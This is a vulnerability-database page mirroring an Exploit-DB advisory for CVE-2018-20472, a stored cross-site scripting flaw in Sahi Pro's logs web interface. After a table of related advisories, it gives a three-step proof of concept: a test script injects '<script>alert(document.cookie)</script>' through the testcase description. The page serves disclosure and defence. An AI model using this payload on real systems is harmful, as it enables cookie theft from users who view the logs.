Sahi pro 8.x - Cross-Site Scripting

🗓️ 18 Jun 2019 00:00:00Reported by Goutham MadhwarajType

exploitdb🔗 www.exploit-db.com👁 202 Views

Sensitive stored XSS vulnerability in Sahi Pro 8.

Reporter	Title	Published	Views	Family All 11
0day.today	Sahi pro 8.x - Cross-Site Scripting Vulnerability	18 Jun 201900:00	–	zdt
Circl	CVE-2018-20472	2 May 202106:29	–	circl
CVE	CVE-2018-20472	17 Jun 201913:22	–	cve
Cvelist	CVE-2018-20472	17 Jun 201913:22	–	cvelist
EUVD	EUVD-2018-13026	7 Oct 202500:30	–	euvd
exploitpack	Sahi pro 8.x - Cross-Site Scripting	18 Jun 201900:00	–	exploitpack
NVD	CVE-2018-20472	17 Jun 201914:15	–	nvd
OSV	CVE-2018-20472	17 Jun 201914:15	–	osv
Packet Storm	Sahi Pro 8.x Cross Site Scripting	18 Jun 201900:00	–	packetstorm
Prion	Cross site scripting	17 Jun 201914:15	–	prion

# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20472
# POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/

DESCRIPTION :

An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. Description parameter of Testcase API can be used to exploit the stored XSS.


POC :

step 1 :

 create a sahi test automation script with the following content and save the file with ".sah" extension ( example : poc.sah) :

            var $tc1 = _testcase(“TC-1″,”<script>alert(document.cookie)</script>”).start();

           _log(“testing stored XSS injection”);

            $tc1.end();

Step 2 :

Execute the created script ( poc.sah ) using sahi GUI controller .

Step 3 : navigate to the web logs console ( http://<ip>:<port>/logs ) using the browser for the executed script. XSS is triggered .

18 Jun 2019 00:00Current

5.9Medium risk

Vulners AI Score5.9

CVSS 23.5

CVSS 3.15.4

EPSS0.00288